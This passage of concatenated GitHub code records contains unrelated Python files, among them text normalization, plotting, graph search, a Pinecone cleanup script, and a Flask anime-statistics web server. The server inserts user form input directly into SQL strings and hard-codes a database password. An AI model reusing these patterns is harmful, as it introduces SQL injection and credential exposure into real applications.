attention_mask_labels_with_prompt = torch.cat([attention_prefix, attention_mask_labels, attention_suffix], dim=1) # (batch_size, n_tokens_labels + n_prefix_tokens + n_suffix_tokens)\n \n return attention_mask_labels_with_prompt\n","repo_name":"tonywu71/distilling-and-forgetting-in-large-pre-trained-models","sub_path":"trainer/prompting.py","file_name":"prompting.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"418979147","text":"class Normalizer:\n def __init__(self, options):\n if options.strip_punctuation:\n self.strip_punctuation_op = lambda tokens: [\n t\n for t in tokens\n if not t.is_punct\n ]\n else:\n self.strip_punctuation_op = lambda tokens: tokens\n\n if options.normalize_digits:\n self.normalize_digits_op = lambda tokens: [\n ('[DIGITS]' if t.is_digit else t)\n for t in tokens\n ]\n else:\n self.normalize_digits_op = lambda tokens: tokens\n\n if options.lower:\n self.lower_op = lambda tokens: [\n t.lower()\n for t in tokens\n ]\n else:\n self.lower_op = lambda tokens: tokens\n\n def normalize(self, sent):\n tokens = list(sent)\n ## SpaCy object ops\n tokens = self.strip_punctuation_op(tokens)\n tokens = self.normalize_digits_op(tokens)\n ## switch to string ops\n tokens = [str(t) for t in tokens]\n tokens = self.lower_op(tokens)\n return tokens\n\nclass CLI:\n @staticmethod\n def addNormalizationOptions(parser):\n parser.add_option('--lower', dest='lower',\n action='store_true', default=False,\n help='lowercase all text')\n parser.add_option('--strip-punctuation', dest='strip_punctuation',\n action='store_true', default=False,\n help='strip punctuation tokens')\n 
parser.add_option('--normalize-digits', dest='normalize_digits',\n action='store_true', default=False,\n help='normalize digits to [DIGITS]')\n @staticmethod\n def logNormalizationOptions(options):\n return [\n ('Lowercasing', options.lower),\n ('Stripping punctuation', options.strip_punctuation),\n ('Normalizing digits', options.normalize_digits),\n ]\n","repo_name":"drgriffis/text-essence","sub_path":"lib/normalization.py","file_name":"normalization.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"37"} +{"seq_id":"29723559321","text":"import os\nimport numpy as np\nimport pandas as pd\nimport plotly.io as pio\nimport plotly.graph_objects as go\n\nfrom plotly.subplots import make_subplots\n\n\ndef ohlc_chart(df: pd.DataFrame, plot_ta: bool = False) -> go.Figure:\n \"\"\"Create a OHLC candlestick chart from a ticker dataframe.\n\n Args:\n df (pd.DataFrame): ticker dataframe to plot.\n\n Returns:\n go.Figure: plotly figure.\n \"\"\"\n df.index = pd.to_datetime(df.index, format=\"%Y-%m-%d %H:%M:%S\")\n\n fig = make_subplots(\n rows=2,\n cols=1,\n shared_xaxes=True,\n vertical_spacing=0.03,\n subplot_titles=(\"OHLC\", \"Volume\"),\n row_width=[0.2, 0.7],\n )\n\n fig.add_trace(\n go.Candlestick(\n x=df.index,\n open=df.Open,\n high=df.High,\n low=df.Low,\n close=df.Close,\n name=\"OHLC\",\n ),\n row=1,\n col=1,\n )\n\n fig.add_trace(go.Bar(x=df.index, y=df.Volume, showlegend=False), row=2, col=1)\n\n if plot_ta:\n for k, ta in df.filter(like=\"MA\").items():\n fig.add_trace(go.Scatter(x=df.index, y=ta, name=k))\n\n if \"BB_MIDDLE\" in df.columns:\n fig.add_trace(\n go.Scatter(\n x=df.index, y=df.BB_MIDDLE, line_color=\"black\", name=\"BB_MD\"\n ),\n row=1,\n col=1,\n )\n fig.add_trace(\n go.Scatter(\n x=df.index,\n y=df.BB_UPPER,\n line_color=\"gray\",\n line={\"dash\": \"dash\"},\n name=\"BB_UP\",\n opacity=0.5,\n ),\n row=1,\n col=1,\n )\n fig.add_trace(\n go.Scatter(\n x=df.index,\n y=df.BB_LOWER,\n line_color=\"gray\",\n line={\"dash\": \"dash\"},\n fill=\"tonexty\",\n name=\"BB_LW\",\n opacity=0.5,\n ),\n row=1,\n col=1,\n )\n\n fig.update(layout_xaxis_rangeslider_visible=False)\n\n return fig\n\n\ndef plot_result(\n df: pd.DataFrame,\n y_true: np.array,\n y_hat: np.array,\n path: str,\n mode: str,\n split: float,\n) -> go.Figure:\n \"\"\"Plot the results of the classification or the regression tasks.\n It adds the plots in the candlestick chart.\n\n Args:\n df (pd.DataFrame): data used to do the prediction.\n y_true (np.array): targets.\n y_hat (np.array): predictions.\n path (str): path to store the figure.\n mode (str): clf or reg.\n split (float): plot a vertical line based on the percentage of split\n if it is bigger than 0.\n\n Returns:\n go.Figure: updated figure.\n \"\"\"\n fig = ohlc_chart(df, plot_ta=True)\n\n window = len(df.index) - len(y_true)\n if mode.lower() == \"reg\":\n fig.add_trace(go.Scatter(x=df.index[window:], y=y_true, name=\"Real\"))\n fig.add_trace(go.Scatter(x=df.index[window:], y=y_hat, name=\"Prediction\"))\n elif mode.lower() == \"clf\":\n y = np.where((y_true == 1) & (y_hat == 1), 1, np.nan) * df.Close.mean()\n fig.add_trace(\n go.Scatter(x=df.index[window:], y=y, name=\"Target == Pred\", mode=\"markers\"),\n row=1,\n col=1,\n )\n\n if split > 0.0:\n x = int(len(df.index) * split)\n dt = df.index[x]\n fig.add_vrect(\n x0=dt,\n x1=dt,\n line_dash=\"dash\",\n annotation_text=\"Test set\",\n annotation_position=\"top left\",\n )\n\n if os.path.exists(path) is False:\n 
os.makedirs(path, exist_ok=True)\n\n    pio.write_image(fig, f\"./{path}/figure.png\", width=3840, height=2160)\n    return fig\n","repo_name":"presedo93/forestock","sub_path":"tools/plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27078216072","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\nfrom queue import Queue\n\nwitness=[] # global variable used to record any witness for violation of bipartite graphs\n\n'''\nBFS traversal using queue and adjacency list\n'''\ndef BFSVisit(q, adjL): \n    while q.empty()==False: # Do breadth first search until the queue is empty\n        \n        i=q.get() # dequeue\n        if adjL[i][-1]==1: # Determine color of neighbouring vertices of i\n            nColor = 2 # if i.color=Black (1), then neighboring vertex color=Green (2)\n        else: # else if i.color=Green (2), then neighboring vertex color=Black (1)\n            nColor = 1\n        for v in adjL[i][0:-1]: # explore each edge out of the current node at index i\n            v -= 1 # adjust for index in adjacency matrix : vertex 1 is stored at index 0\n            if adjL[v][-1]==0: # if vertex v is white i.e. unvisited, then color v and enqueue\n                adjL[v][-1]=nColor\n                q.put(v)\n            elif adjL[v][-1]!=nColor: # if v is already in the same color as i, then not a bipartite graph \n                global witness\n                witness=i,v # record the adjacent vertices in same color as witness\n                return -1\n    return 0 \n\n\n'''\nKeep two partitions of the bipartite graph in two tuples, and return them\n'''\ndef get_biPartitions(adjL): \n    \n    black=[] # vertices with color black will be kept here\n    green=[] # vertices with color green will be kept here\n\n    for i in range(len(adjL)): # for each vertex, look at the color and put in correct list\n        if adjL[i][-1]==1:\n            black.append(i+1)\n        elif adjL[i][-1]==2:\n            green.append(i+1)\n    return tuple(black),tuple(green) # return as tuples, for printing\n\n\n'''\nMain function to take inputs and determine if the graph is bipartite\n'''\n\nif __name__=='__main__':\n\n    n=int(input()) # read number of vertices from input line 1 \n    adjL=[[] for _ in range(n)] # initialise adjacency list with length as number of vertices\n    for i in range(n): # store adjacency list from next n input lines\n        adjL[i]=list(map(int,input().split()))\n    \n    for i in range(n):\n        adjL[i].append(0) # 0 : White. Color each vertex in white.\n\n    q=Queue(maxsize=n) # initialise max size of queue as number of vertices\n\n    for i in range(n):\n        if adjL[i][-1]==0: # Perform BFS traversal for each unvisited vertex (i.e. vertex of color white).\n            adjL[i][-1]=1 # 1: Black. The vertex is coloured black\n            q.put(i) # enqueue vertex for BFS search\n            rc=BFSVisit(q,adjL) # perform breadth first search\n            if rc==-1: # if discrepancies found, print the witness, along with the partitions done before discrepancy\n                black,green=get_biPartitions(adjL)\n                print(\"No \",witness, \" are adjacent vertices in bi partitions \", black,green)\n                break\n\n    if rc==0: # if no discrepancies found from any of the BFS searches \n        black,green=get_biPartitions(adjL) # get the partitions of the bipartite graph, and print\n        print(\"Yes \",black,green)\n\n","repo_name":"Sujata018/Solution-to-Datastructure-problems","sub_path":"isBipartite.py","file_name":"isBipartite.py","file_ext":"py","file_size_in_byte":3507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
 +{"seq_id":"26813990915","text":"from config import *\nimport pinecone\n\n# delete all namespaces except the ones in the list\n\nnamespaces_to_keep = [\"test-both-python3\", \"google_drive1\"]\n\n\nindex = pinecone.Index(os.getenv(\"PINECONE_INDEX_NAME\"))\nstats = index.describe_index_stats()\n\nnamespaces = stats[\"namespaces\"].keys()\n\nfor namespace in namespaces:\n    if namespace not in namespaces_to_keep:\n        print(f\"Deleting namespace {namespace}\")\n        index.delete(delete_all=True, namespace=namespace)","repo_name":"rparappuram/python-chatbot","sub_path":"scripts/deleteNamespaces.py","file_name":"deleteNamespaces.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
 +{"seq_id":"8266265905","text":"from typing import List\nfrom typing import Optional\n\nfrom ...clients.kvmd import KvmdClient\nfrom ...clients.streamer import StreamerClient\n\nfrom ... import htclient\n\nfrom .. import init\n\nfrom .vncauth import VncAuthManager\nfrom .server import VncServer\n\n\n# =====\ndef main(argv: Optional[List[str]]=None) -> None:\n    config = init(\n        prog=\"kvmd-vnc\",\n        description=\"VNC to KVMD proxy\",\n        check_run=True,\n        argv=argv,\n    )[2].vnc\n\n    user_agent = htclient.make_user_agent(\"KVMD-VNC\")\n\n    VncServer(\n        host=config.server.host,\n        port=config.server.port,\n        max_clients=config.server.max_clients,\n\n        no_delay=config.server.no_delay,\n\n        tls_ciphers=config.server.tls.ciphers,\n        tls_timeout=config.server.tls.timeout,\n\n        desired_fps=config.desired_fps,\n        keymap_path=config.keymap,\n\n        kvmd=KvmdClient(\n            user_agent=user_agent,\n            **config.kvmd._unpack(),\n        ),\n        streamer=StreamerClient(\n            user_agent=user_agent,\n            **config.streamer._unpack(),\n        ),\n        vnc_auth_manager=VncAuthManager(**config.auth.vncauth._unpack()),\n\n        **config.server.keepalive._unpack(),\n    ).run()\n","repo_name":"James992927108/Temp_Kvmd_File","sub_path":"Kvmd-code/apps/vnc/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42292557415","text":"# -*- encoding: utf-8 -*-\nimport os\nimport six.moves.cPickle as pickle\nimport numpy as np\nimport configure\nimport json\ntry:\n    import cv2 as cv\nexcept:\n    raise\n\nclass ImagePkl:\n    # initial state\n    json_list = {}\n\n    def __init__(self):\n        cfg = configure.Configure()\n        self._configure = cfg.load_config()\n        self._data_dir_path = self._configure['data_dir_path']\n        self._n_types_target = -1\n        self._dump_name = self._configure['pkl_dump_file_name']\n        self._image_size = self._configure['image_size']\n\n    # search the directories where the dataset images are stored\n    def get_dir_list(self):\n        tmp = os.listdir(self._data_dir_path)\n        if tmp is None:\n            return None\n        ret = []\n        for x in tmp:\n            if os.path.isdir(self._data_dir_path+x):\n                if len(os.listdir(self._data_dir_path+x)) >= 2:\n                    ret.append(x)\n        return sorted(ret)\n\n    # get the class id\n    def get_class_id(self, fname):\n        dir_list = self.get_dir_list()\n        dir_name = list(filter(lambda x:x in fname, dir_list))  # materialise the filter object so it can be indexed below\n        return dir_list.index(dir_name[0])\n\n    def get_class_name(self, id):\n        dir_list = self.get_dir_list()\n        return dir_list[id]\n\n    def set_code_name(self, name, id):\n        self.json_list[str(id)] = name\n\n    def create_data_target(self):\n        dir_list = self.get_dir_list()\n        ret = {}\n        target = []\n        data = []\n        print(\"create pkl data\")\n        for i, dir_name in enumerate(dir_list):\n            file_list = os.listdir(self._data_dir_path + dir_name)\n            for file_name in file_list:\n                root, ext = os.path.splitext(file_name)\n                if ext.upper() == '.JPG':\n                    abs_name = self._data_dir_path + dir_name + '/' + file_name\n                    class_id = self.get_class_id(abs_name)\n                    self.set_code_name(dir_name, class_id)\n                    target.append(class_id)\n                    image = cv.imread(abs_name)\n                    image = cv.resize(image, (self._image_size, self._image_size))\n                    image = image.transpose(2, 0, 1)\n                    image = image/255.\n                    data.append(image)\n        data = np.array(data, np.float32)\n        target = np.array(target, np.int32)\n        self._dump_dataset(data, target)\n        self._dump_json_code()\n        print(\"done\")\n\n    def _dump_json_code(self):\n        json.dump(self.json_list,\n                  open('./models/code_name.json', 'wb'),\n                  ensure_ascii=False)\n\n    def _dump_dataset(self, data, target):\n        pickle.dump((data, target), open(self._dump_name, 'wb'), -1)\n\n    def load_dataset(self):\n        data, target = pickle.load(open(self._dump_name, 'rb'))\n        return data, target\n","repo_name":"rusla-tt/ConvolutionImage","sub_path":"app/lib/ImagePkl.py","file_name":"ImagePkl.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
 +{"seq_id":"73428879466","text":"print (\"Introduzca dos números: \\n\")\r\n\r\nwhile True: #indefinite loop to check that the entered values are correct, i.e. real numbers\r\n\r\n\ttry:\r\n\t\tnumero_1 = float(input (\"Introduce el primer número: \"))\r\n\t\tnumero_2 = float(input (\"Introduce el segundo número: \"))\r\n\t\tbreak\r\n\texcept:\r\n\t\tprint (\"El valor introducido no es un número. \\n Introduzca un valor correcto:\")\r\n\r\n\r\ndef diferentes(num_1,num_2):\r\n\t\"\"\"function that determines whether the numbers are different and, if so, indicates which one is greater\"\"\"\r\n\r\n\tif num_1 != num_2 and num_1 > num_2:\r\n\t \treturn print (\"El primer número introducido: \"+ str(num_1) + \" es mayor que el segundo número introducido: \"+ str(num_2) + \"\\n\")\r\n\telse:\r\n\t\treturn\tprint(\"El segundo número introducido: \"+ str(num_2) + \" es mayor o igual que el primer número introducido: \"+ str(num_1) + \"\\n\")\r\n\r\n\r\ndef iguales (num_1,num_2):\r\n\t\"\"\"function that determines whether the numbers are equal\"\"\"\r\n\r\n\tif num_1 == num_2:\r\n\t\treturn print (\"\\nLos números introducidos son iguales \\n\")\r\n\telse:\r\n\t\treturn print (\"\\nlos números introducidos son diferentes \\n\")\r\n\r\niguales(numero_1,numero_2)\r\ndiferentes(numero_1,numero_2)\r\n\r\n\t\r\n\t\r\n\r\n","repo_name":"Txus77/theegg_ai","sub_path":"tarea_95/ejercicio_1.py","file_name":"ejercicio_1.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19182490417","text":"#!/usr/bin/env python2.7\n\n\"\"\"\nColumbia's COMS W4111.001 Introduction to Databases\nExample Webserver\n\nTo run locally:\n\n    python server.py\n\nGo to http://localhost:8111 in your browser.\n\nA debugger such as \"pdb\" may be helpful for debugging.\nRead about it online.\n\"\"\"\n\nimport os\nfrom sqlalchemy import *\nfrom sqlalchemy.pool import NullPool\nfrom flask import Flask, request, render_template, g, redirect, Response\n\ntmpl_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'templates')\napp = Flask(__name__, template_folder=tmpl_dir)\n\n\n#\n# The following is a dummy URI that does not connect to a valid database. You will need to modify it to connect to your Part 2 database in order to use the data.\n#\n# XXX: The URI should be in the format of:\n#\n#     postgresql://USER:PASSWORD@104.196.18.7/w4111\n#\n# For example, if you had username biliris and password foobar, then the following line would be:\n#\n#     DATABASEURI = \"postgresql://biliris:foobar@104.196.18.7/w4111\"\n#\nDATABASEURI = \"postgresql://jc5067:5777@34.73.21.127/proj1part2\"\n\n\n#\n# This line creates a database engine that knows how to connect to the URI above.\n#\nengine = create_engine(DATABASEURI)\n\n#\n# Example of running queries in your database\n# Note that this will probably not work if you already have a table named 'test' in your database, containing meaningful data. 
This is only an example showing you how to run queries in your database using SQLAlchemy.\n#\n#engine.execute(\"\"\"CREATE TABLE IF NOT EXISTS test (\n# id serial,\n# name text\n#);\"\"\")\n#engine.execute(\"\"\"INSERT INTO test(name) VALUES ('grace hopper'), ('alan turing'), ('ada lovelace');\"\"\")\n\n\n@app.before_request\ndef before_request():\n \"\"\"\n This function is run at the beginning of every web request\n (every time you enter an address in the web browser).\n We use it to setup a database connection that can be used throughout the request.\n\n The variable g is globally accessible.\n \"\"\"\n try:\n g.conn = engine.connect()\n except:\n print(\"uh oh, problem connecting to database\")\n import traceback; traceback.print_exc()\n g.conn = None\n\n@app.teardown_request\ndef teardown_request(exception):\n \"\"\"\n At the end of the web request, this makes sure to close the database connection.\n If you don't, the database could run out of memory!\n \"\"\"\n try:\n g.conn.close()\n except Exception as e:\n pass\n\n\n#\n# @app.route is a decorator around index() that means:\n# run index() whenever the user tries to access the \"/\" path using a GET request\n#\n# If you wanted the user to go to, for example, localhost:8111/foobar/ with POST or GET then you could use:\n#\n# @app.route(\"/foobar/\", methods=[\"POST\", \"GET\"])\n#\n# PROTIP: (the trailing / in the path is important)\n#\n# see for routing: http://flask.pocoo.org/docs/0.10/quickstart/#routing\n# see for decorators: http://simeonfranklin.com/blog/2012/jul/1/python-decorators-in-12-steps/\n#\n@app.route('/')\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route('/anime')\ndef anime():\n return render_template('anime.html')\n\n\n@app.route('/anime_search_result', methods=['POST'])\ndef anime_search_result():\n startdate = request.form['startdate']\n enddate = request.form['enddate']\n airing = request.form['air']\n producer = request.form.getlist('producer')\n licensor = request.form.getlist('licensor')\n if startdate == '': startdate = '1900-01-01'\n if enddate == '': enddate = '2019-01-01'\n query = '''\n SELECT DISTINCT A.title\n FROM anime_created_by A, producer P, anime_status_updated_by B\n WHERE A.anime_id = B.anime_id AND A.producer_id = P.producer_id AND\n A.date > DATE ('{}') AND A.date < DATE ('{}')\n '''.format(startdate, enddate)\n if airing == 'yes': query += ' AND B.airing = True'\n elif airing == 'no': query += ' AND B.airing = False'\n if 'All' not in producer:\n producer = list(map(lambda x: \"'\"+x+\"'\", producer))\n query += ' AND (P.studio = ' + ' OR P.studio = '.join(producer) + ')'\n if 'All' not in licensor:\n licensor = list(map(lambda x:\"'\"+x+\"'\", licensor))\n query += ' AND (P.licensor = ' + ' OR P.licensor = '.join(licensor) + ')'\n #print(query)\n try:\n cursor = g.conn.execute(query)\n except Exception as e:\n return render_template(\"error.html\",error = e)\n animeOutput = []\n for anime in cursor:\n animeOutput.append(anime[0])\n cursor.close()\n if animeOutput == []:\n return render_template('noresult.html')\n else:\n anime_score = dict()\n anime_sub = dict()\n anime_view = dict()\n for anime in animeOutput:\n query = ''' \n SELECT P.score, P.subscriptions, P.num_viewed, AVG(P.score), AVG(P.subscriptions), AVG(P.num_viewed)\n FROM popularity P, rated_by R, anime_created_by A\n WHERE P.rank = R.rank AND R.anime_id = A.anime_id AND A.title = '{}'\n GROUP BY P.score, P.subscriptions, P.num_viewed\n '''.format(anime)\n cursor = g.conn.execute(query)\n for r in cursor:\n 
anime_score[anime] = r[0]\n anime_sub[anime] = r[1]\n anime_view[anime] = r[2]\n avg_score = r[3]\n avg_sub = r[4]\n avg_num_viewed = r[5]\n cursor.close()\n context = dict(animeOutput = animeOutput, anime_score = anime_score, anime_sub = anime_sub, anime_view = anime_view, avg_score = avg_score, avg_sub = avg_sub, avg_num_viewed = avg_num_viewed)\n return render_template(\"anime_search_result.html\", **context)\n\n \n@app.route('/anime_stat')\ndef anime_stat():\n query = '''\n SELECT MAX(P.score), MAX(P.subscriptions), MAX(P.num_viewed)\n FROM anime_created_by A, rated_by R, popularity P\n WHERE A.anime_id = R.anime_id AND R.rank = P.rank;\n '''\n cursor = g.conn.execute(query)\n for r in cursor:\n max_score = r[0]\n max_sub = r[1]\n max_view = r[2]\n cursor.close()\n query = '''\n SELECT A.title\n FROM anime_created_by A, rated_by R, popularity P\n WHERE A.anime_id = R.anime_id AND R.rank = P.rank AND P.score = '{}';\n '''.format(max_score)\n #print(query)\n cursor = g.conn.execute(query)\n for r in cursor:\n max_score_anime = r[0]\n cursor.close()\n query = '''\n SELECT A.title\n FROM anime_created_by A, rated_by R, popularity P\n WHERE A.anime_id = R.anime_id AND R.rank = P.rank AND P.subscriptions = '{}';\n '''.format(max_sub)\n cursor = g.conn.execute(query)\n for r in cursor:\n max_sub_anime = r[0]\n cursor.close()\n query = '''\n SELECT A.title\n FROM anime_created_by A, rated_by R, popularity P\n WHERE A.anime_id = R.anime_id AND R.rank = P.rank AND P.num_viewed = '{}';\n '''.format(max_view)\n cursor = g.conn.execute(query)\n for r in cursor:\n max_view_anime = r[0]\n cursor.close()\n \n highest_score = [max_score_anime, max_score]\n largest_sub = [max_sub_anime, max_sub]\n largest_view = [max_view_anime, max_view]\n context = dict(highest_score = highest_score, largest_sub = largest_sub, largest_view = largest_view)\n return render_template('anime_stat.html', **context)\n\n\n@app.route('/anime_stat_search_result', methods=['POST'])\ndef anime_stat_search():\n low_score = request.form['low_score']\n sub_level = request.form['sub_level']\n view_level = request.form['view_level']\n query = '''\n SELECT DISTINCT A.title\n FROM popularity P, rated_by R, anime_created_by A\n WHERE P.rank = R.rank AND R.anime_id = A.anime_id\n '''\n if not low_score == '':\n low_score = float(low_score)\n query += ' AND P.score > {}'.format(low_score)\n if not sub_level == '':\n sub_level = int(sub_level)\n query += ' AND P.subscriptions > {}'.format(sub_level)\n if not view_level == '':\n view_level = int(view_level)\n query += ' AND P.num_viewed > {}'.format(view_level)\n try:\n cursor = g.conn.execute(query)\n except Exception as e:\n return render_template(\"error.html\",error = e)\n animeOutput = []\n for anime in cursor:\n animeOutput.append(anime[0])\n cursor.close()\n if animeOutput == []:\n return render_template('stat_noresult.html')\n else:\n anime_score = dict()\n anime_sub = dict()\n anime_view = dict()\n for anime in animeOutput:\n query = ''' \n SELECT P.score, P.subscriptions, P.num_viewed, AVG(P.score), AVG(P.subscriptions), AVG(P.num_viewed)\n FROM popularity P, rated_by R, anime_created_by A\n WHERE P.rank = R.rank AND R.anime_id = A.anime_id AND A.title = '{}'\n GROUP BY P.score, P.subscriptions, P.num_viewed\n '''.format(anime)\n cursor = g.conn.execute(query)\n for r in cursor:\n anime_score[anime] = r[0]\n anime_sub[anime] = r[1]\n anime_view[anime] = r[2]\n avg_score = r[3]\n avg_sub = r[4]\n avg_num_viewed = r[5]\n cursor.close()\n context = dict(animeOutput = animeOutput, 
anime_score = anime_score, anime_sub = anime_sub, anime_view = anime_view, avg_score = avg_score, avg_sub = avg_sub, avg_num_viewed = avg_num_viewed)\n return render_template(\"anime_stat_search_result.html\", **context)\n \n@app.route('/user')\ndef user():\n return render_template(\"user.html\")\n \n@app.route('/result2',methods =['POST'])\ndef result2():\n country = request.form['country']\n gender = request.form['gender']\n birth1 = request.form['birth1']\n birth2 = request.form['birth2']\n air = request.form['air']\n access_date = request.form['access_date']\n query = ''' \n SELECT U.username\n FROM user_lives_at U, location L, access C, anime_status_updated_by A1\n WHERE U.user_id = C.user_id AND L.location_id = U.location_id AND A1.anime_id = C.anime_id\n '''\n if not country == 'All':\n query += '''\n AND L.country = '{}'\n '''.format(country)\n if not gender == 'All':\n query += '''\n AND U.gender = '{}'\n '''.format(gender)\n if not air == 'All':\n query += '''\n AND A1.airing = '{}'\n '''.format(air)\n if not access_date == '':\n query += '''\n AND C.since > '{}'\n '''.format(access_date)\n if not birth1 == '':\n query += '''\n AND U.birthdate > DATE '{}'\n '''.format(birth1)\n if not birth2 == '':\n query += '''\n AND U.birthdate < DATE '{}'\n '''.format(birth2)\n query += ' GROUP BY U.username'\n #print(query)\n try:\n cursor = g.conn.execute(query)\n except Exception as e:\n return render_template(\"error.html\",error = e)\n users = []\n for result in cursor:\n users.append(result[0])\n #print(users)\n cursor.close()\n if users == []:\n context = dict(num_user='No User', avg_anime='')\n #print('DASHFGIAYEFGIEYA')\n else:\n num_anime = 0\n num_user = len(users)\n for user in users:\n query = ''' \n SELECT COUNT(C.anime_id)\n FROM user_lives_at U, access C\n WHERE U.user_id = C.user_id AND U.username = '{}'\n '''.format(user)\n cursor = g.conn.execute(query)\n for r in cursor:\n num_anime += int(r[0])\n context = dict(num_user='Number of users: ' + str(num_user), avg_anime='Average number of animes watched:'+str(num_anime / num_user))\n return render_template(\"user.html\", **context)\n\n\n@app.route('/explore')\ndef explore():\n cursor = g.conn.execute('''\n SELECT DISTINCT A.title\n FROM anime_created_by A, producer P\n WHERE A.producer_id = P.producer_id AND\n A.date > DATE ('2008-11-11') AND (P.studio = 'Satelight');\n ''')\n a = []\n for result in cursor:\n a.append(result[0])\n cursor.close()\n context1 = dict(data1 = a)\n\n cursor = g.conn.execute('''\n SELECT COUNT(DISTINCT user_id)\n FROM access U JOIN anime_status_updated_by A ON U.anime_id = A.anime_id\n WHERE A.airing = FALSE;\n ''')\n b = []\n for result in cursor:\n b.append(result[0])\n cursor.close()\n context2 = dict(data2 = b)\n\n cursor = g.conn.execute('''\n SELECT AVG(P.score)\n FROM popularity P JOIN rated_by R ON P.rank = R.rank\n WHERE P.num_viewed > 10000;\n ''')\n c = []\n for result in cursor:\n c.append(result[0])\n cursor.close()\n context3 = dict(data3 = c)\n return render_template(\"explore.html\", **context1, **context2, **context3)\n\n\n\n# Example of adding new data to the database\n@app.route('/add', methods=['POST'])\ndef add():\n name = request.form['name']\n g.conn.execute('INSERT INTO test VALUES (NULL, ?)', name)\n return redirect('/')\n\n\n@app.route('/login')\ndef login():\n abort(401)\n this_is_never_executed()\n\n\nif __name__ == \"__main__\":\n import click\n\n @click.command()\n @click.option('--debug', is_flag=True)\n @click.option('--threaded', is_flag=True)\n 
@click.argument('HOST', default='0.0.0.0')\n @click.argument('PORT', default=8111, type=int)\n def run(debug, threaded, host, port):\n \"\"\"\n This function handles command line parameters.\n Run the server using:\n\n python server.py\n\n Show the help text using:\n\n python server.py --help\n\n \"\"\"\n\n HOST, PORT = host, port\n print(\"running on %s:%d\" % (HOST, PORT))\n app.run(host=HOST, port=PORT, debug=debug, threaded=threaded)\n\n\n run()\n","repo_name":"Caspar0-0/JPAnimationDatabase","sub_path":"casparchen-cs4111-proj1/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":13819,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"15317089628","text":"import subprocess\nimport tempfile\nfrom collections import defaultdict\nfrom sectools.common.utils.c_logging import logger\nimport os\nimport sys\nimport zipfile\n\nsplit_string_into_list_of_n_size_strings = lambda string, n:[string[i:i+n] for i in range(0, len(string), n)]\nxor = lambda x,y : x^y\njoin_ints_list_to_hex_string = lambda ints_list : \"\".join([(\"0x%0.2X\" % x)[2:] for x in ints_list])\n\nif \"check_output\" not in dir( subprocess ): # duck punch it in!\n def f(*popenargs, **kwargs):\n if 'stdout' in kwargs:\n raise ValueError('stdout argument not allowed, it will be overridden.')\n process = subprocess.Popen(stdout=subprocess.PIPE, *popenargs, **kwargs)\n output, unused_err = process.communicate()\n retcode = process.poll()\n if retcode:\n cmd = kwargs.get(\"args\")\n if cmd is None:\n cmd = popenargs[0]\n raise subprocess.CalledProcessError(retcode, ' '.join(cmd))\n return output\n subprocess.check_output = f\n\nclass LogWrappedFunction(object):\n def __init__(self, function):\n self.function = function\n\n def logAndCall(self, *arguments, **namedArguments):\n logger.debug(\"Calling %s with arguments %s and named arguments %s\" %\\\n (self.function.func_name, arguments, namedArguments))\n return self.function.__call__(*arguments, **namedArguments)\n\ndef logwrap(function):\n return LogWrappedFunction(function).logAndCall\n\n\ndef system_command_logged(command_list,stderr_to_temp = False, shell=False):\n tmp_stderr_file = None\n\n if stderr_to_temp == True:\n tmp_stderr_file=tempfile.NamedTemporaryFile(delete=False)\n logger.debug(\"Creating temp file for stderr of external command: \"+ tmp_stderr_file.name)\n logger.debug(\"Command List: \" + repr(command_list))\n logger.debug(\"Executing System command:\" + \" \".join(command_list))\n return subprocess.check_output(command_list, stderr=tmp_stderr_file, shell=shell)\n\ndef store_data_to_temp_file(data):\n temp_file = tempfile.NamedTemporaryFile(delete=False)\n logger.debug(\"Writing data: \")#+ repr(data))\n logger.debug(\"To temporary file: \" + temp_file.name)\n temp_file.write(data)\n temp_file.close()\n return temp_file.name\n\ndef store_data_to_file(file_name, data):\n file_handle = open(file_name,\"wb\")\n logger.debug(\"Writing data: \")#+ repr(data))\n logger.debug(\"To file: \" + file_handle.name)\n file_handle.write(data)\n file_handle.close()\n return file_handle.name\n\n\ndef normalize_param_list_into_dict(certificate_subject_list):\n \"\"\" Converts list of certificate params to dict\n input:\n certificate_subject_list: List of certificate param strings e.g.\n ['C=US', 'ST=California', 'L=San Diego', 'OU=General Use Test Key (for testing only)', 'OU=CDMA Technologies', 'O=QUALCOMM', 'CN=QCT Root CA 1']\n\n output:\n certificate_subject_dictionary: Dictionary of certificate 
